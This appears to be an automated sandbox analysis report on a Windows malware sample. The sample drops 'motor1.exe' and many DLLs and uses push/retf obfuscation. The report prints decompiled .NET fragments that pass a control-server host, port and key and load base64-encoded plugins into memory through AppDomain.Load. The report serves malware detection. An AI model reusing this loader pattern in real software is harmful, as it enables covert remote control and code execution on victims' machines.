Source:	Binary string: crypto\stack\stack.ccompiler: cl /Zi /Fdossl_static.pdb /MD /Zl /Gs0 /GF /Gy -O2 -Ob2 -MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMcrypto\ex_data.c source: motor1.exe, 00000004.00000000.2408388110.00007FF7EDD07000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000002.2541531038.00007FF7EDD07000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000002.2542097890.00007FFD93D7C000.00000002.00000001.01000000.00000014.sdmp, motor1.exe, 00000015.00000002.2600550256.00007FF643557000.00000002.00000001.01000000.0000001A.sdmp, motor1.exe, 00000015.00000000.2546559477.00007FF643557000.00000002.00000001.01000000.0000001A.sdmp, motor1.exe, 00000015.00000002.2602655358.00007FFD9370C000.00000002.00000001.01000000.00000027.sdmp
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndTime.pdb source: motor1.exe, 00000004.00000002.2546961814.00007FFDA4168000.00000002.00000001.01000000.00000013.sdmp, motor1.exe, 00000004.00000003.2451689953.0000022D5F59F000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000015.00000002.2604332137.00007FFDA3318000.00000002.00000001.01000000.00000026.sdmp
Source:	Binary string: d:\a01\_work\3\s\\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: motor1.exe, 00000004.00000002.2551275327.00007FFDAC0D5000.00000002.00000001.01000000.0000000E.sdmp, motor1.exe, 00000015.00000002.2605772212.00007FFDA54C5000.00000002.00000001.01000000.00000022.sdmp, vcruntime140_1.dll.4.dr
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndFilesystem.pdb** source: motor1.exe, 00000004.00000002.2548964543.00007FFDA555F000.00000002.00000001.01000000.0000000F.sdmp, motor1.exe, 00000015.00000002.2603587965.00007FFD9B1BF000.00000002.00000001.01000000.00000028.sdmp
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndException.pdb source: motor1.exe, 00000004.00000002.2548205143.00007FFDA4342000.00000002.00000001.01000000.00000011.sdmp, motor1.exe, 00000015.00000002.2604475973.00007FFDA3342000.00000002.00000001.01000000.00000025.sdmp
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndTime.pdb source: motor1.exe, 00000004.00000002.2546961814.00007FFDA4168000.00000002.00000001.01000000.00000013.sdmp, motor1.exe, 00000004.00000003.2451689953.0000022D5F59F000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000015.00000002.2604332137.00007FFDA3318000.00000002.00000001.01000000.00000026.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /MD /Zl /Gs0 /GF /Gy -O2 -Ob2 -MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: motor1.exe, 00000004.00000002.2543383507.00007FFD944E2000.00000002.00000001.01000000.00000008.sdmp, motor1.exe, 00000004.00000002.2542632185.00007FFD94148000.00000002.00000001.01000000.0000000A.sdmp, motor1.exe, 00000004.00000000.2408388110.00007FF7EDD07000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000002.2541531038.00007FF7EDD07000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000002.2542097890.00007FFD93D7C000.00000002.00000001.01000000.00000014.sdmp, motor1.exe, 00000015.00000002.2603187948.00007FFD93A72000.00000002.00000001.01000000.0000001C.sdmp, motor1.exe, 00000015.00000002.2600550256.00007FF643557000.00000002.00000001.01000000.0000001A.sdmp, motor1.exe, 00000015.00000000.2546559477.00007FF643557000.00000002.00000001.01000000.0000001A.sdmp, motor1.exe, 00000015.00000002.2602655358.00007FFD9370C000.00000002.00000001.01000000.00000027.sdmp, motor1.exe, 00000015.00000002.2601968221.00007FFD92D38000.00000002.00000001.01000000.0000001F.sdmp, WebUid.dll.4.dr
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndVersion.pdb source: motor1.exe, 00000004.00000002.2546408225.00007FFDA3A8B000.00000002.00000001.01000000.00000017.sdmp, motor1.exe, 00000015.00000002.2604104370.00007FFDA32FB000.00000002.00000001.01000000.00000029.sdmp
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndOS.pdb'' source: motor1.exe, 00000004.00000002.2545756356.00007FFDA384D000.00000002.00000001.01000000.00000010.sdmp, motor1.exe, 00000015.00000002.2604639455.00007FFDA336D000.00000002.00000001.01000000.00000024.sdmp
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndCrashHandler.pdb source: motor1.exe, 00000004.00000002.2549295572.00007FFDA55D7000.00000002.00000001.01000000.00000009.sdmp, motor1.exe, 00000015.00000002.2605254125.00007FFDA37A7000.00000002.00000001.01000000.0000001D.sdmp, FndCrashHandler.dll.1.dr
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndHash.pdb source: motor1.exe, 00000004.00000002.2546678084.00007FFDA3AEE000.00000002.00000001.01000000.00000015.sdmp, motor1.exe, 00000015.00000002.2603749260.00007FFDA2E9E000.00000002.00000001.01000000.0000002A.sdmp
Source:	Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: motor1.exe, 00000004.00000002.2539797410.0000022D5F517000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: crypto\stack\stack.ccompiler: cl /Zi /Fdossl_static.pdb /MD /Zl /Gs0 /GF /Gy -O2 -Ob2 -MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1k 25 Mar 2021built on: Wed Aug 4 14:11:39 2021 UTCplatform: VC-conan-Release-Windows-x86_64-Visual Studio-16OPENSSLDIR: "D:\conan\openssl\1.1.1k\_\_\package\3fb49604f9c2f729b85ba3115852006824e72cab\res"userSDIR: "D:\conan\openssl\1.1.1k\_\_\package\3fb49604f9c2f729b85ba3115852006824e72cab\lib\users-1_1"not availablecrypto\ex_data.c source: motor1.exe, 00000004.00000002.2543383507.00007FFD944E2000.00000002.00000001.01000000.00000008.sdmp, motor1.exe, 00000004.00000002.2542632185.00007FFD94148000.00000002.00000001.01000000.0000000A.sdmp, motor1.exe, 00000015.00000002.2603187948.00007FFD93A72000.00000002.00000001.01000000.0000001C.sdmp, motor1.exe, 00000015.00000002.2601968221.00007FFD92D38000.00000002.00000001.01000000.0000001F.sdmp, WebUid.dll.4.dr
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndCrashHandler.pdbqq source: motor1.exe, 00000004.00000002.2549295572.00007FFDA55D7000.00000002.00000001.01000000.00000009.sdmp, motor1.exe, 00000015.00000002.2605254125.00007FFDA37A7000.00000002.00000001.01000000.0000001D.sdmp, FndCrashHandler.dll.1.dr
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndOS.pdb source: motor1.exe, 00000004.00000002.2545756356.00007FFDA384D000.00000002.00000001.01000000.00000010.sdmp, motor1.exe, 00000015.00000002.2604639455.00007FFDA336D000.00000002.00000001.01000000.00000024.sdmp
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\installer.pdb source: motor1.exe, 00000004.00000000.2408388110.00007FF7EDD07000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000002.2541531038.00007FF7EDD07000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000015.00000002.2600550256.00007FF643557000.00000002.00000001.01000000.0000001A.sdmp, motor1.exe, 00000015.00000000.2546559477.00007FF643557000.00000002.00000001.01000000.0000001A.sdmp
Source:	Binary string: C:\Users\runneradmin\AppData\Local\Temp\pkg.d7c6a10fb0263a69b4596321\node\out\Release\node.pdb source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71C909000.00000002.00000001.01000000.00000003.sdmp
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndHash.pdb!! source: motor1.exe, 00000004.00000002.2546678084.00007FFDA3AEE000.00000002.00000001.01000000.00000015.sdmp, motor1.exe, 00000015.00000002.2603749260.00007FFDA2E9E000.00000002.00000001.01000000.0000002A.sdmp
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndException.pdb%% source: motor1.exe, 00000004.00000002.2548205143.00007FFDA4342000.00000002.00000001.01000000.00000011.sdmp, motor1.exe, 00000015.00000002.2604475973.00007FFDA3342000.00000002.00000001.01000000.00000025.sdmp
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndString.pdb source: motor1.exe, 00000004.00000002.2552861990.00007FFDAC107000.00000002.00000001.01000000.0000000B.sdmp, motor1.exe, 00000015.00000002.2606186290.00007FFDA5BB7000.00000002.00000001.01000000.0000001E.sdmp, FndString.dll.4.dr
Source:	Binary string: d:\a01\_work\3\s\\binaries\amd64ret\bin\amd64\\vcomp140.amd64.pdb source: vcomp140.dll.1.dr
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\WebUid.pdb source: motor1.exe, 00000004.00000002.2543383507.00007FFD944E2000.00000002.00000001.01000000.00000008.sdmp, motor1.exe, 00000004.00000002.2541254363.0000026DF6050000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000015.00000002.2603187948.00007FFD93A72000.00000002.00000001.01000000.0000001C.sdmp, WebUid.dll.4.dr
Source:	Binary string: d:\a01\_work\3\s\\binaries\amd64ret\bin\amd64\\vcomp140.amd64.pdbGCTL source: vcomp140.dll.1.dr
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndFilesystem.pdb source: motor1.exe, 00000004.00000002.2548964543.00007FFDA555F000.00000002.00000001.01000000.0000000F.sdmp, motor1.exe, 00000015.00000002.2603587965.00007FFD9B1BF000.00000002.00000001.01000000.00000028.sdmp
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndAppLocations.pdb source: motor1.exe, 00000004.00000002.2550154810.00007FFDAC0C5000.00000002.00000001.01000000.00000012.sdmp, motor1.exe, 00000015.00000002.2605618348.00007FFDA5495000.00000002.00000001.01000000.00000023.sdmp
Source:	Binary string: C:\Users\runneradmin\AppData\Local\Temp\pkg.d7c6a10fb0263a69b4596321\node\out\Release\node.pdb) source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71C909000.00000002.00000001.01000000.00000003.sdmp
Source:	Binary string: d:\a01\_work\3\s\\binaries\amd64ret\bin\amd64\\msvcp140_codecvt_ids.amd64.pdb source: motor1.exe, 00000004.00000002.2539797410.0000022D5F52B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: d:\a01\_work\3\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: motor1.exe, 00000004.00000002.2552193033.00007FFDAC0F1000.00000002.00000001.01000000.0000000D.sdmp, motor1.exe, 00000015.00000002.2604813167.00007FFDA3391000.00000002.00000001.01000000.00000021.sdmp
Source:	Binary string: d:\a01\_work\3\s\\binaries\amd64ret\bin\amd64\\msvcp140.amd64.pdb source: motor1.exe, 00000004.00000002.2546154593.00007FFDA38B5000.00000002.00000001.01000000.0000000C.sdmp, motor1.exe, 00000015.00000002.2605019875.00007FFDA33F5000.00000002.00000001.01000000.00000020.sdmp
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndAppLocations.pdb source: motor1.exe, 00000004.00000002.2550154810.00007FFDAC0C5000.00000002.00000001.01000000.00000012.sdmp, motor1.exe, 00000015.00000002.2605618348.00007FFDA5495000.00000002.00000001.01000000.00000023.sdmp

Source: pKxhpP0spW.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: pKxhpP0spW.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: pKxhpP0spW.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: pKxhpP0spW.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: pKxhpP0spW.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 4.2.motor1.exe.22d63855e08.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 4.2.motor1.exe.22d63855e08.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 4.2.motor1.exe.22d63855e08.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 4.2.motor1.exe.22d65c2e478.3.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 4.2.motor1.exe.22d65c2e478.3.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 4.2.motor1.exe.22d65c2e478.3.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 4.2.motor1.exe.22d6384cc49.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 4.2.motor1.exe.22d6384cc49.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 4.2.motor1.exe.22d6384cc49.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 4.2.motor1.exe.22d65ca92a1.2.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 4.2.motor1.exe.22d65ca92a1.2.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 4.2.motor1.exe.22d65ca92a1.2.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 4.2.motor1.exe.22d65c252b9.4.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 4.2.motor1.exe.22d65c252b9.4.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 4.2.motor1.exe.22d65c252b9.4.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)

.NET source code contains potential unpacker

Source: 4.2.motor1.exe.22d63855e08.1.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 4.2.motor1.exe.22d63855e08.1.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 4.2.motor1.exe.22d63855e08.1.raw.unpack, Messages.cs	.Net Code: Memory
Source: 4.2.motor1.exe.22d65c2e478.3.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 4.2.motor1.exe.22d65c2e478.3.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 4.2.motor1.exe.22d65c2e478.3.raw.unpack, Messages.cs	.Net Code: Memory
Source: 4.2.motor1.exe.22d6384cc49.0.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 4.2.motor1.exe.22d6384cc49.0.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 4.2.motor1.exe.22d6384cc49.0.raw.unpack, Messages.cs	.Net Code: Memory
Source: 4.2.motor1.exe.22d65ca92a1.2.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 4.2.motor1.exe.22d65ca92a1.2.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 4.2.motor1.exe.22d65ca92a1.2.raw.unpack, Messages.cs	.Net Code: Memory
Source: 4.2.motor1.exe.22d65c252b9.4.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 4.2.motor1.exe.22d65c252b9.4.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 4.2.motor1.exe.22d65c252b9.4.raw.unpack, Messages.cs	.Net Code: Memory

Binary contains a suspicious time stamp

Source: api-ms-win-crt-process-l1-1-0.dll.1.dr

Static PE information: 0xA8F275DA [Mon Oct 27 06:36:10 2059 UTC]

PE file contains sections with non-standard names

Source: pKxhpP0spW.exe	Static PE information: section name: _RDATA
Source: boost_filesystem-mt-x64.dll.1.dr	Static PE information: section name: _RDATA
Source: FndCrashHandler.dll.1.dr	Static PE information: section name: CPADinfo
Source: vcomp140.dll.1.dr	Static PE information: section name: _RDATA
Source: vcruntime140.dll.1.dr	Static PE information: section name: _RDATA
Source: boost_filesystem-mt-x64.dll.4.dr	Static PE information: section name: _RDATA
Source: FndCrashHandler.dll.4.dr	Static PE information: section name: CPADinfo
Source: vcomp140.dll.4.dr	Static PE information: section name: _RDATA
Source: vcruntime140.dll.4.dr	Static PE information: section name: _RDATA

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93B745BE push rax; retf	4_2_00007FFD93B745D3
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93B745D7 push rax; retf	4_2_00007FFD93B745D3
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93E645D7 push rax; retf	4_2_00007FFD93E645D3
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93E645BE push rax; retf	4_2_00007FFD93E645D3
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD942645D7 push rax; retf	4_2_00007FFD942645D3
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD942645BE push rax; retf	4_2_00007FFD942645D3

Drops PE files

Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\msvcp140_codecvt_ids.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\FndOS.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\WebUid.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\FndHash.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\FndAppLocations.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\FndPointer.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\boost_filesystem-mt-x64.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\glog.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\boost_filesystem-mt-x64.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\FndTime.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-private-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\cpr.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\FndException.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\FndNetworking.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\vcruntime140_1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\FndCrashHandler.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\vcomp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\msvcp140_atomic_wait.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\WebUid.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\api-ms-win-crt-private-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\msvcp140_2.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\api-ms-win-crt-multibyte-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\msvcp140_atomic_wait.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\FndTime.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\FndOS.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\FndPointer.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\msvcp140_1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\glog.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\FndFilesystem.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\cpr.dll	Jump to dropped file
